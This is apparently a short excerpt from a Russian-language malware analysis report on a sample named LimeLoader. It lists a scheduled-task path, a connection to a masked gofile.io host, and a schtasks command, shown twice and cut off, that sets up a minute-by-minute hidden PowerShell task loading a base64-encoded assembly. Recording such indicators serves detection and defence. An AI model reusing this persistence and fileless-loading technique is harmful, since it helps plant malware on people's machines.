Техническая информация
- <SYSTEM32>\tasks\limeloader
- 'sr####le5.gofile.io':443
- DNS ASK sr####le5.gofile.io
- '<SYSTEM32>\schtasks.exe' /create /sc minute /mo 1 /tn LimeLoader /tr "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64St...' (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /create /sc minute /mo 1 /tn LimeLoader /tr "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64St...